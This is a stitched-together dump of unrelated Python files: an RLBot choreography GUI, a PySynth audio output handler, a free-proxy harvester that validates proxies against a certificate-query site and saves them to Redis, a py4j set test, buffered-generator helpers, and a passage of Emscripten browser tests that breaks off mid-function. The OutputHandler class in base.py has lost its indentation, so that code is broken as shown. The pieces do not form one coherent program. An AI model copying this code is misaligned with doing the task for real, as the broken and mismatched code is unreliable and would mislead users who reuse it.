        manager.connect_to_game()
        manager.start_match()

    def run_RLBotChoreography(self, queue):
        """
        If Hivemind breaks out of game_loop it is reloaded and recreated.
        """
        # Waits until a START command is received.
        while queue.get() != QCommand.START:
            continue

        self.setup_match()

        while True:
            # Reloads hivemind for new changes to take place.
            reload(hivemind)
            my_hivemind = hivemind.Hivemind(queue, self.choreo_obj)
            try:
                my_hivemind.start()  # Loop only quits on STOP command.
            except Exception as e:
                print(f'[ERROR]: {e}')

            # Checks what to do after Hivemind died.
            command = queue.get()
            if command == QCommand.ALL:
                self.setup_match()
            elif command == QCommand.EXIT:
                break

        exit()  # Clean exit.

    def run_gui(self, queue):
        """
        Runs the simple gui.
        """

        def reload_choreographies():
            """
            Finds and reloads all choreo modules and puts the found choreographies inside a dictionary.
            """
            # Automatically finds all choreo modules.
            modules = glob.glob(join(dirname(__file__), "choreography/choreos/*.py"))
            choreo_modules = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]

            choreographies = {}
            for choreo in choreo_modules:
                module = f'choreography.choreos.{choreo}'
                # Try reloading the module.
                try:
                    reload(sys.modules[module])
                    classes = inspect.getmembers(sys.modules[module], inspect.isclass)
                # If not loaded yet, import it.
                except Exception as e:
                    print(e)
                    print(f'Importing {module}')
                    import_module(module)
                    classes = inspect.getmembers(sys.modules[module], inspect.isclass)
                # Find all the choreography classes inside.
                finally:
                    for name, obj in classes:
                        # Checks whether the class subclasses Choreography.
                        if issubclass(obj, Choreography) and obj is not Choreography:
                            # FIXME Watch out for name conflicts!
                            choreographies[name] = obj

            return choreographies

        def start():
            num_bots_changed()
            print("[RLBotChoreography]: Starting up!")
            queue.put(QCommand.START)
            # Removes the button so we cannot start again.
            button_start.destroy()
            # The reload buttons only appear once the show has started.
            # Hive reset button.
            button_reload_hive = tk.Button(frame, text="↻ Hivemind", command=reload_hive)
            button_reload_hive.pack()
            # All reset button.
            button_reload_all = tk.Button(frame, text="↻ All", command=reload_all)
            button_reload_all.pack()

        def num_bots_changed():
            """
            Looks at the choreography's requested number of bots and uses that. Otherwise will use the entered number.
            """
            try:
                num_bots = self.choreo_obj.get_num_bots()
            except NotImplementedError:
                num_bots = int(entry_num_bots.get())
            finally:
                # Clamp to the engine's player limit and reflect the final
                # value back into the entry box.
                self.min_bots = min(int(num_bots), MAX_PLAYERS)
                entry_num_bots.delete(0, last=tk.END)
                entry_num_bots.insert(0, self.min_bots)

        def choreo_selected(var):
            """
            Updates the selected choreography.
            """
            self.choreographies = reload_choreographies()
            self.choreo_obj = self.choreographies[var]
            num_bots_changed()

        def reload_hive():
            num_bots_changed()
            print("[RLBotChoreography]: Stopping Hivemind.")
            queue.put(QCommand.STOP)
            choreo_selected(menuvar.get())
            print("[RLBotChoreography]: Reloading Hivemind.")
            queue.put(QCommand.HIVE)

        def reload_all():
            num_bots_changed()
            print("[RLBotChoreography]: Stopping Hivemind.")
            queue.put(QCommand.STOP)
            choreo_selected(menuvar.get())
            print("[RLBotChoreography]: Reloading all.")
            queue.put(QCommand.ALL)

        # TODO Make GUI look better.
        import tkinter as tk
        root = tk.Tk()
        frame = tk.Frame(root)
        frame.pack()

        # Start button.
        button_start = tk.Button(frame, text="Start", command=start)
        button_start.pack()

        # Dropdown menu.
        self.choreographies = reload_choreographies()
        menuvar = tk.StringVar(root)
        menuvar.set('ConnectedChoreo')  # Set the default option
        dropMenu = tk.OptionMenu(frame, menuvar, *self.choreographies, command=choreo_selected)
        dropMenu.pack()

        # Label for the entry box.
        label_num_bots = tk.Label(frame, text="Number of bots")
        label_num_bots.pack()

        # Number of bots entry box.
        entry_num_bots = tk.Entry(frame)
        entry_num_bots.insert(0, 10)  # 10 is default.
        entry_num_bots.pack()

        # This is here just to make sure everything is set up by default.
        choreo_selected(menuvar.get())

        root.mainloop()

        # Clean exit.
        print('[RLBotChoreography]: Shutting down.')
        queue.put(QCommand.STOP)
        queue.put(QCommand.EXIT)
        exit()
if __name__ == '__main__':
    # Starts the show :) -- constructing the class spawns the GUI and
    # Hivemind threads and blocks until the command queue drains.
    RLBotChoreography()
|
base.py | """
PySynth Output Classes
We contain the PySynth OutputHandler,
and OutputControl.
Both classes handle and manage output from synth chains,
and send them to output modules attached to the Control class.
The Output class is the engine of this process,
pulling audio info and passing it along.
The OutputControl class manages the synth chains,
adding and removing them as necessary.
The design of the output class is heavily structured for sequencer use,
but you could script synth output using certain features located in OutputControl.
"""
from chaslib.misctools import get_logger
import threading
from concurrent.futures import ThreadPoolExecutor
import traceback
from chaslib.sound.utils import BaseModule, AudioMixer, get_time
from chaslib.sound.out import BaseOutput
class OutputControl(BaseModule):
    """
    Output Control - Controls adding and removing synths from the OutputHandler.

    We offer an easy to use interface for adding synths to the OutputHandler.
    We act as any other synth module,
    but when we are started, we add ourselves to the OutputHandler.
    This starts the other modules attached to us, and audio information is consumed by the OutputHandler.

    Because of this, we should be the LAST module in a synth chain.
    If not, then some information could be lost,
    and errors could occur when outputting information.

    We offer the ability to add ourselves to the OutputHandler until we are stopped
    (Great for sequencer use).
    We also offer ways to add ourselves for a certain period of time,
    or a certain number of samples.

    Point is, if you iterate over us,
    or call our start method,
    then we will add ourselves to the OutputHandler until we are stopped.

    You shouldn't create this module directly.
    Instead, you should receive your very own OutputControl module
    when you bind a synth to the OutputHandler.
    """

    OUT = []  # Reference to OutputHandler

    def __init__(self):

        super(OutputControl, self).__init__()

        self.time_remove = 0  # Time to remove ourselves. If 0, then we don't keep track
        self.item_written = 0  # Number of items to write. If 0, then we don't keep track
        self.wait = threading.Event()  # Set while we are NOT running; join() waits on it

        self.wait.set()

    def start(self):
        """
        We simply prepare the object for iteration.
        '__iter__()' does all the dirty work!
        """
        # Clear our event so join() blocks until stop() is called:
        self.wait.clear()

        return iter(self)

    def stop(self):
        """
        Remove ourselves from the OutputHandler.
        """
        # Remove ourselves from the OutputHandler:
        self.OUT[0]._remove_synth(self)

        self.time_remove = 0
        self.item_written = 0

        # Stop the chain:
        self.input.stop_modules()

        # Set our event so anyone blocked in join() wakes up.
        # (BUGFIX: this previously called clear(), which left join() callers
        # blocked forever after the chain had stopped.)
        self.wait.set()

    def join(self):
        """
        Waits until the SynthChain has stopped.

        We use a threading Event object to handle the blocking.
        """
        # Wait on the threading event:
        self.wait.wait()

    def get_next(self):
        """
        We simply return values from the synth chain attached to us.

        We also do some checks to determine if we should stop.
        If we do stop, we will call our 'stop()' method,
        which will remove us from the OutputHandler.
        """
        if not self.info.running:
            # The chain has stopped, lets exit:
            self.stop()
            return 0

        # BUGFIX: both limit checks below were inverted, causing the chain to
        # be removed immediately instead of once the limit was reached.
        if self.time_remove != 0 and get_time() >= self.time_remove:
            # Time to remove ourselves! Our time is up!
            self.stop()
            return 0

        if self.item_written != 0 and self.index >= self.item_written:
            # We have written everything we can, lets remove:
            self.stop()
            return 0

        # Otherwise, lets just return!
        return self.get_input()

    def write_time(self, time):
        """
        Registers ourselves with the OutputHandler until we reach time.

        :param time: Time to stop sending info to Output
        :type time: int
        """
        # Set the time limit:
        self.time_remove = time

        # Start ourselves:
        self.start()

    def write_num(self, num):
        """
        Registers ourselves to the OutputHandler for a number of iterations.

        :param num: Number of values to write
        :type num: int
        """
        # Set the max write limit:
        self.item_written = num

        # Start ourselves:
        self.start()

    def __iter__(self):
        """
        We do the same as BaseModule,
        except we add ourselves to the OutputHandler,
        and we don't call 'start()'!
        """
        # Reset the index value:
        self.index = 0

        # Prepare the sub-modules:
        self.input.start_modules()

        # Set our started value:
        self.started = True

        # Add ourselves to the OutputHandler:
        self.OUT[0]._add_synth(self)

        # Return ourselves:
        return self
class OutputHandler:
"""
OutputHandler - Handles and coordinates sending audio data to certain locations
We handle the addition and subtraction of synths,
allowing them to be added and removed on the fly.
This is useful for systems such as the sequencer.
We also allow for outputting info to multiple sources,
so one could configure the output to send data to speakers
and a wave file at the same time.
When a synth is added, an 'OutputControl' is returned.
This class allows for the control of the synth added,
and allows for the developer to add the synth for a certain amount of time.
It also integrates will with the sequencer.
We are a 'reactive' output system,
meaning we only sample the synths when the modules request us too.
This allows for a balance of speed and accuracy,
so we don't sample more frames then we should.
This also means that we will only sample as quickly as our slowest module.
Most of the time this is ideal,
but if not then you should take care to only load modules you need!
"""
def __init__(self, rate=44100):
    """Create a new OutputHandler.

    :param rate: Sampling rate bound to every synth chain added to us
    :type rate: int
    """
    self._output = []  # Output modules to send information
    self._work = ThreadPoolExecutor()  # Thread pool executor to put our output modules in
    self._input = AudioMixer()  # Audio Collection to mix sound
    self.rate = rate  # Rate to output audio

    self.futures = []  # Futures for modules submitted to the executor
    self.thread = []  # Audio worker threads; join() waits on these
    self.producer_process = None  # Producer thread
    self.run = False  # Value determining if we are running

    self._pause = threading.Event()  # Event object determining if we are paused

    self.log = get_logger("AUDIO")

    # A set event means "not paused" -- start out un-paused:
    self._pause.set()
def add_output(self, out):
    """
    Adds an output module to this class.

    We ensure it inherits BaseOutput, and then we add it.

    If we are currently running,
    then we start it and add it to the thread pool executor.
    If we are not started, then we will wait to add the modules until we have been.

    :param out: Output modules to add
    :type out: BaseOutput
    """
    # Ensure object is output module:
    assert isinstance(out, BaseOutput), "Class must inherit BaseOutput!"

    # Add ourselves to the module:
    out.out = self

    # Check if we are running:
    if self.run:
        # Start and add the module:
        self._submit_module(out)

    # Always record the module in our collection; when we were not running,
    # it will be started later by start():
    self._output.append(out)
def bind_synth(self, synth):
    """
    Binds a synth chain to this output handler.

    An OutputControl instance is returned to manage adding the chain to
    this class, which lets a sequencer drive the synth or lets callers
    add it for a fixed amount of time. The chain's sampling rate is set
    to ours so every synth runs at a consistent rate.

    :param synth: Synth chain to add to output
    :type synth: BaseModule
    :return: OutputControl with the synth chain bound to it
    :rtype: OutputControl
    """
    # Keep the chain's sampling rate in step with ours:
    synth._info.samp = self.rate
    # Build a controller tied to this handler and bind the chain to it:
    control = OutputControl()
    control.OUT.append(self)
    control.bind(synth)
    return control
def start(self):
    """
    Starts the OutputHandler.

    Marks the handler as running, then brings up every output module
    that has been registered so far. Audio is consumed until the
    handler is stopped or paused.
    """
    self.run = True
    # Bring up each registered output module:
    for module in self._output:
        self._submit_module(module)
def stop(self):
    """
    Stops the OutputHandler.

    Clears the running flag and stops every output module in our
    collection. The handler can be started again afterwards, but some
    modules cannot be restarted, so expect errors or certain output
    modules not working after a restart.
    """
    self.run = False
    # Shut down each registered output module:
    for module in self._output:
        self._stop_module(module)
def join(self):
    """Blocks until every audio thread in our collection has finished."""
    for worker in self.thread:
        worker.join()
def pause(self):
    """
    Pauses the OutputHandler.

    Clearing the pause event makes the control loop block until the
    event is set again; no audio is consumed while paused.
    """
    self._pause.clear()
def resume(self):
    """
    Resumes the OutputHandler.

    Setting the pause event lets the control loop continue; audio is
    consumed again once resumed.
    """
    self._pause.set()
def gen_value(self):
    """
    Samples one value from the mixed synth input, forwards it to every
    non-special output module, and returns it.

    Audio is only sampled when this method is called, so modules that
    block before requesting data are all ready to receive it.

    :return: The sampled input value, or None if the handler stopped
        before a valid value was produced.
    """
    # Iterate until we get something valid:
    while self.run:
        # Block here while paused:
        self._pause.wait()
        # Get some audio information:
        try:
            inp = next(self._input)
        except Exception as e:
            self.log.warning("Getting next value failed: {}".format(e))
            self.log.debug("Traceback: \n{}".format(traceback.format_exc()))
            # Fix: previously fell through with 'inp' unbound (NameError on
            # the first iteration) or stale; skip this cycle instead.
            continue
        if inp is None:
            continue
        # Forward the value to our modules:
        for mod in self._output:
            if mod.special:
                # Special modules pull their own input; skip them:
                continue
            mod.add_input(inp)
        return inp
def remove_type(self, out_type):
    """
    Removes every output module of the given type, stopping each one
    before dropping it from the collection.

    :param out_type: Type of module to remove
    """
    # Fix: iterate over a snapshot -- removing from the list while
    # iterating it silently skipped the element after each match.
    for mod in list(self._output):
        # Check if the module is of the requested type:
        if type(mod) == out_type:
            # Stop and drop this module:
            self._stop_module(mod)
            self._output.remove(mod)
def search_type(self, out_type):
    """
    Reports whether an output module of the given type is registered.

    :param out_type: Type to search for
    :type out_type: type
    :return: True for present, False for not
    :rtype: bool
    """
    # Scan the registered modules for an exact type match:
    return any(type(mod) == out_type for mod in self._output)
def _add_synth(self, synth):
"""
Adds a synth to the AudioCollection.
This should really only be called by OutputControl,
as they have the ability to fine-tune the operation.
:param synth: Synth to be added to the Output class
:type synth: BaseModule
"""
# Add the synth to our collection:
self._input.add_module(synth)
def _remove_synth(self, synth):
"""
Removes a synth from the AudioCollection.
This should really only be called by OutputControl,
as they have the ability to fine-tune the operation.
:param synth: Synth to be removed from the Output class
:type synth: BaseModule
"""
# Remove the synth from our collection:
self._input.remove_module(synth)
def _submit_module(self, mod):
"""
We do the dirty work of starting and submitting a module to the ThreadPoolExecutor.
We assume the module inherits BaseOutput,
and that it has been added to the module collection.
If you wish to add a module, you should really use 'add_output'.
:param mod: Output module to start
:type mod: BaseOutput
"""
# Set the run value:
mod.running = True
# Start the module:
mod.start()
# Add it to the collection:
self._work.submit(mod.run)
'''
thread = threading.Thread(target=mod.run)
thread.start()
self.thread.append(thread)
'''
def _stop_module(self, mod):
"""
Stops the given module.
We call the 'stop' method, and set the running value to False.
We also add None to the input queue.
:param mod: Module to stop
:type mod: BaseOutput
"""
# Set the run value:
mod.running = False
# Call the stop method:
mod.stop()
# Add 'None' to the input queue:
mod.add_input(None)
|
Grab_proxies_free.py | import re
import copy
import json
import time
import requests
from lxml import etree
from multiprocessing import Process
from Certificate.DB.RedisClient import RedisClient
def one(page=5):
    """
    Continuously scrapes proxies from kuaidaili.com and saves them.

    :param page: Number of listing pages to scan per cycle. Keep this
        low: later pages are mostly historic IPs with low availability.
    """
    while True:
        try:
            # Fix: the comprehension variable used to shadow the 'page' parameter.
            url_list = ('http://www.kuaidaili.com/proxylist/{page}/'.format(page=n)
                        for n in range(1, page + 1))  # kuaidaili
            for url in url_list:
                content = requests.get(url).content
                tree = etree.HTML(content.decode())
                proxy_list = tree.xpath('.//div[@id="index_free_list"]//tbody/tr')
                for proxy in proxy_list:
                    pro = ':'.join(proxy.xpath('./td/text()')[0:2])
                    save(pro)
        except Exception:
            # Fix: the old bare 'except: continue' skipped the sleep below
            # and busy-looped on persistent failures (and ate Ctrl-C).
            pass
        time.sleep(20)
def two(proxy_number=50):
    """
    Continuously pulls proxies from 66ip.cn and saves them.

    :param proxy_number: Number of proxies to request per cycle.
    """
    while True:
        try:
            url = "http://m.66ip.cn/mo.php?sxb=&tqsl={}&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1&textarea=".format(
                proxy_number)
            # The endpoint responds in GBK encoding:
            html = requests.get(url).content.decode(encoding='gbk')
            for proxy in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', html):
                save(proxy)
        except Exception:
            # Fix: the old bare 'except: continue' skipped the sleep below
            # and busy-looped on persistent failures (and ate Ctrl-C).
            pass
        time.sleep(20)
def three(days=1):
    """
    Continuously scrapes proxies from youdaili.net and saves them.

    :param days: Intended number of daily article pages to scan; currently
        unused while the targeted article-list xpath is commented out.
    """
    session = requests.session()
    headers = {
        'Host': 'www.youdaili.net',
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Cookie': 'yd_cookie=bba7ebbb-e48a-4d40abdd6d4734ad5863fe1573cf1c11de4a; Hm_lvt_f8bdd88d72441a9ad0f8c82db3113a84=1492514708,1493030573; Hm_lpvt_f8bdd88d72441a9ad0f8c82db3113a84=1493032241',
        'If-None-Match': 'W/"59ea-54ddf1ef6a680"',
        'If-Modified-Since': 'Mon, 24 Apr 2017 00:59:36 GMT',
    }
    # NOTE(review): 'session' is prepared but never used below; the
    # session.get call was deliberately commented out upstream.
    session.headers.update(headers)
    while True:
        try:
            url = "http://www.youdaili.net/Daili/http/"  # youdaili proxy listing
            content = requests.get(url, headers=headers).content
            # content = session.get(url, headers=headers, allow_redirects=True).content
            tree = etree.HTML(content.decode())
            # NOTE(review): this grabs EVERY href on the page; the commented
            # xpath below was the targeted article list -- confirm which is wanted.
            # page_url_list = tree.xpath('.//div[@class="chunlist"]/ul//a/@href')[0:days]
            page_url_list = tree.xpath('//@href')
            for page_url in page_url_list:
                html = requests.get(page_url).content.decode()
                proxy_list = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', html)
                for proxy in proxy_list:
                    save(proxy)
        except Exception as e:
            print(e)
            # Fix: 'continue' here used to skip the sleep and busy-loop.
        time.sleep(10)
def four(page=10):
    """
    Continuously scrapes proxies from xicidaili.com and saves them.

    :param page: Number of listing pages to scan per cycle.
    """
    while True:
        try:
            headers = {
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Host': 'www.xicidaili.com',
                'Upgrade-Insecure-Requests': '1',
                'Accept-Language': 'zh-CN,zh;q=0.8',
                'Connection': 'keep-alive',
                'If-None-Match': 'W/"58408f21027f0e6342c149d748ca26b8"',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
            }
            # Fix: the comprehension variable used to shadow the 'page' parameter.
            url_list = ('http://www.xicidaili.com/nn/{page}/'.format(page=n)
                        for n in range(1, page + 1))
            for url in url_list:
                content = requests.get(url, headers=headers).content
                tree = etree.HTML(content.decode())
                proxy_list = tree.xpath('//*[@id="ip_list"]//tr')
                for proxy in proxy_list:
                    try:
                        pro = proxy.xpath('td[2]/text()')[0] + ':' + proxy.xpath('td[3]/text()')[0]
                        save(pro)
                    except Exception:
                        # Header rows have no td[2]/td[3]; skip them.
                        continue
        except Exception:
            # Fix: 'continue' here used to skip the sleep and busy-loop.
            pass
        time.sleep(10)
def five():
    """Continuously scrapes proxies from goubanjia.com and saves them."""
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Host': 'www.goubanjia.com',
        'Upgrade-Insecure-Requests': '1',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    }
    while True:
        try:
            url = "http://www.goubanjia.com/free/gngn/index.shtml"  # 'goubanjia'
            content = requests.get(url, headers=headers).content
            tree = etree.HTML(content.decode())
            # The table only ever shows ten rows; host text is split across
            # nested span/div elements, the last element being the port.
            for i in range(10):
                try:
                    d = tree.xpath('.//table[@class="table"]/tbody/tr[{}]/td'.format(i + 1))[0]
                    o = d.xpath('.//span/text() | .//div/text()')
                    pro = ''.join(o[:-1]) + ':' + o[-1]
                    save(pro)
                except Exception:
                    continue
        except Exception:
            # Fix: 'continue' here used to skip the sleep and busy-loop.
            pass
        time.sleep(10)
def save(proxy):
    """
    Validates a candidate proxy by fetching a ping URL through it and,
    on an HTTP 200 response, records it in Redis (deduplicated).

    :param proxy: Proxy address as a 'host:port' string.
    :raises requests.RequestException: On connection/timeout failures
        (callers catch these).
    """
    conn = RedisClient(name='certificate_proxies')
    proxies = {
        'http': 'http://%s' % proxy,
        'https': 'http://%s' % proxy,
    }
    # ping_url = 'http://www.baidu.com'
    ping_url = 'http://zscx.osta.org.cn/'
    # Fix: actually route the request through the candidate proxy; without
    # proxies= the check only ever tested the local direct connection.
    status_code = requests.get(ping_url, proxies=proxies, timeout=(3.01, 6.01)).status_code
    if status_code == 200:
        p = json.dumps(proxies)
        now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
        check = conn.exist(p)
        if not check:
            conn.set(p, 1)
            conn.lpush(p)
            now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
            print(now, ' New proxies: ', p)
        else:
            print(now, ' already exist proxies: ', p)
if __name__ == '__main__':
    processes = {}
    # Map worker id -> scraper function. NOTE(review): id 4 (five) is never
    # started because the spawn loop below only covers ids 1..3 -- confirm
    # whether that is intentional.
    dd = {
        1: one,
        2: two,
        # 3: 'three',
        3: four,
        4: five
    }
    for i in range(1, 4):
        worker_name = i
        p = Process(target=dd[i], args=())
        p.start()
        print(p.pid)
        processes[worker_name] = p
    # Supervise the workers: restart dead/failed ones, reap finished ones.
    while len(processes) > 0:
        # A shallow list of the keys is enough; deepcopy was unnecessary.
        task_list = list(processes.keys())
        print(task_list)
        for task in task_list:
            p = processes[task]
            time.sleep(1)
            if p.exitcode is None:
                if not p.is_alive():
                    p_re = Process(target=dd[task], args=())
                    p_re.start()
                    # Fix: register the restart under its own id; the old code
                    # used the stale 'worker_name' from the spawn loop.
                    processes[task] = p_re
                    print('not alive restart', task, p_re.pid, p_re.name)
                else:
                    continue
                    # print(task, 'still alive...')
            elif p.exitcode == 0:
                # Fix: call is_alive() -- the bare method reference was always
                # truthy, making the printed flag meaningless.
                print(task, 'finished', p.pid, p.exitcode, not p.is_alive())
                p.join()
                del processes[task]
            else:
                p_re = Process(target=dd[task], args=())
                p_re.start()
                processes[task] = p_re
                print('err exit and restart', task, p_re.pid, p_re.name)
|
java_set_test.py | '''
Created on Mar 26, 2010
@author: Barthelemy Dagenais
'''
from __future__ import unicode_literals, absolute_import
from multiprocessing import Process
import subprocess
import time
import unittest
from py4j.java_gateway import JavaGateway
from py4j.tests.java_gateway_test import PY4J_JAVA_PATH, safe_shutdown
def start_example_server():
    """Runs the py4j ExampleApplication JVM in the foreground (blocks)."""
    cmd = ["java", "-cp", PY4J_JAVA_PATH, "py4j.examples.ExampleApplication"]
    subprocess.call(cmd)
def start_example_app_process():
    """Launches the example JVM in a child process and returns it.

    XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    """
    proc = Process(target=start_example_server)
    proc.start()
    return proc
class AutoConvertTest(unittest.TestCase):
    """Checks Python-to-Java auto-conversion of sets through the gateway."""

    def setUp(self):
        # Uncomment to debug the py4j protocol:
        # logger = logging.getLogger("py4j")
        # logger.setLevel(logging.DEBUG)
        # logger.addHandler(logging.StreamHandler())
        self.p = start_example_app_process()
        time.sleep(0.5)
        self.gateway = JavaGateway(auto_convert=True)

    def tearDown(self):
        safe_shutdown(self)
        self.p.join()
        time.sleep(0.5)

    def testAutoConvert(self):
        # A java.util.HashSet should compare equal to an auto-converted
        # Python set holding the same elements.
        java_set = self.gateway.jvm.java.util.HashSet()
        for item in ('b', 1):
            java_set.add(item)
        self.assertTrue(java_set.equals(set([1, 'b'])))
class Test(unittest.TestCase):
    """Compares java.util sets against Python sets without auto-conversion."""

    def setUp(self):
        # Uncomment to debug the py4j protocol:
        # logger = logging.getLogger("py4j")
        # logger.setLevel(logging.DEBUG)
        # logger.addHandler(logging.StreamHandler())
        self.p = start_example_app_process()
        time.sleep(0.5)
        self.gateway = JavaGateway()

    def tearDown(self):
        safe_shutdown(self)
        self.p.join()
        time.sleep(0.5)

    def _check_parity(self, set1, set2, elements):
        # Sizes and per-element membership must agree between the two sets.
        self.assertEqual(len(set1), len(set2))
        for element in elements:
            self.assertEqual(element in set1, element in set2)

    def testTreeSet(self):
        # self.gateway.jvm.py4j.GatewayServer.turnLoggingOn()
        local = set()
        remote = self.gateway.jvm.java.util.TreeSet()
        local.add('a')
        remote.add('a')
        self._check_parity(local, remote, ['a'])
        self.assertEqual(repr(local), repr(remote))
        local.add('b')
        remote.add('b')
        self._check_parity(local, remote, ['a', 'b'])
        # repr equality is not a good assumption with Python 3.3. Oh dear.
        local.remove('a')
        remote.remove('a')
        self._check_parity(local, remote, ['a', 'b'])
        local.clear()
        remote.clear()
        self._check_parity(local, remote, ['a', 'b'])

    def testHashSet(self):
        local = set()
        remote = self.gateway.jvm.java.util.HashSet()
        for item in ('a', 1, 'b'):
            local.add(item)
            remote.add(item)
        self._check_parity(local, remote, ['a', 'b', 1])
        local.remove(1)
        remote.remove(1)
        self._check_parity(local, remote, ['a', 'b', 1])
        local.clear()
        remote.clear()
        self._check_parity(local, remote, ['a', 'b', 1])
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
buffering.py | import multiprocessing as mp
import queue
import threading
def buffered_gen_mp(source_gen, buffer_size=2):
    """
    Generator that runs a slow source generator in a separate process.

    :param source_gen: Iterable producing the data items.
    :param buffer_size: Maximal number of items to pre-generate (length of
        the buffer); must be at least 2.
    :raises RuntimeError: If buffer_size < 2.
    """
    if buffer_size < 2:
        raise RuntimeError("Minimal buffer size is 2!")

    # The effective buffer size is one less, because the generation process
    # will generate one extra element and block until there is room in the buffer.
    buffer = mp.Queue(maxsize=buffer_size - 1)

    def _buffered_generation_process(source_gen, buffer):
        for data in source_gen:
            buffer.put(data, block=True)
        buffer.put(None)  # sentinel: signal the end of the iterator
        # Closing alone does not suffice as a signal: a buffer.get() issued
        # before the close would block forever, hence the sentinel above.
        buffer.close()

    process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
    # Fix: daemonize so an abandoned (not fully consumed) generator cannot
    # keep the interpreter alive at exit.
    process.daemon = True
    process.start()

    for data in iter(buffer.get, None):
        yield data
    # Fix: reap the worker once the sentinel has been seen.
    process.join()
def buffered_gen_threaded(source_gen, buffer_size=2):
    """
    Generator that runs a slow source generator in a separate thread.
    Beware of the GIL!

    :param source_gen: Iterable producing the data items.
    :param buffer_size: Maximal number of items to pre-generate (length of
        the buffer); must be at least 2.
    :raises RuntimeError: If buffer_size < 2.
    """
    if buffer_size < 2:
        raise RuntimeError("Minimal buffer size is 2!")

    # Effective capacity is buffer_size - 1: the producer thread builds one
    # extra item and then blocks until the consumer makes room.
    buffer = queue.Queue(maxsize=buffer_size - 1)

    def _producer(src, sink):
        for item in src:
            sink.put(item, block=True)
        sink.put(None)  # sentinel: signal the end of the iterator

    worker = threading.Thread(target=_producer, args=(source_gen, buffer))
    worker.daemon = True
    worker.start()

    for item in iter(buffer.get, None):
        yield item
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
    """
    Serves 'data' over HTTP on localhost:11111 for the chunked-XHR browser test.

    :param support_byte_ranges: Whether to honour Range requests.
    :param chunkSize: Unused here; kept for the caller's signature.
    :param data: The byte payload to serve.
    :param checksum: Unused here; kept for the caller's signature.
    :param port: Origin port allowed by the CORS headers.
    """
    class ChunkedServerHandler(BaseHTTPRequestHandler):
        # Fix: 'extra' was a mutable default ([]); an immutable tuple avoids
        # the shared-mutable-default pitfall. 'length' binds len(data) once at
        # definition time, which is fine because 'data' never changes.
        def sendheaders(s, extra=(), length=len(data)):
            s.send_response(200)
            s.send_header("Content-Length", str(length))
            s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
            s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
            s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
            s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
            s.send_header("Content-type", "application/octet-stream")
            if support_byte_ranges:
                s.send_header("Accept-Ranges", "bytes")
            for i in extra:
                s.send_header(i[0], i[1])
            s.end_headers()

        def do_HEAD(s):
            s.sendheaders()

        def do_OPTIONS(s):
            s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)

        def do_GET(s):
            if s.path == '/':
                s.sendheaders()
            elif not support_byte_ranges:
                s.sendheaders()
                s.wfile.write(data)
            else:
                # Serve only the requested byte range, clamped to the data size.
                start, end = s.headers.get("range").split("=")[1].split("-")
                start = int(start)
                end = int(end)
                end = min(len(data) - 1, end)
                length = end - start + 1
                s.sendheaders([], length)
                s.wfile.write(data[start:end + 1])

    # CORS preflight makes OPTIONS requests which we need to account for.
    expectedConns = 22
    httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
    for i in range(expectedConns + 1):
        httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
    """Copies a shell template, substituting {{{ SCRIPT }}} with 'replacement'."""
    with open(path_from_root('src', shell_file)) as template:
        contents = template.read()
    with open(output_file, 'w') as out:
        out.write(contents.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
    """Truthy when the configured test browser looks like Chrome/Chromium."""
    browser_cmd = EMTEST_BROWSER
    return browser_cmd and 'chrom' in browser_cmd.lower()
def no_chrome(note='chrome is not supported'):
    """Decorator factory: skips the test under Chrome, no-op elsewhere."""
    if not is_chrome():
        return lambda f: f
    return unittest.skip(note)
def is_firefox():
    """Truthy when the configured test browser looks like Firefox."""
    browser_cmd = EMTEST_BROWSER
    return browser_cmd and 'firefox' in browser_cmd.lower()
def no_firefox(note='firefox is not supported'):
    """Decorator factory: skips the test under Firefox, no-op elsewhere."""
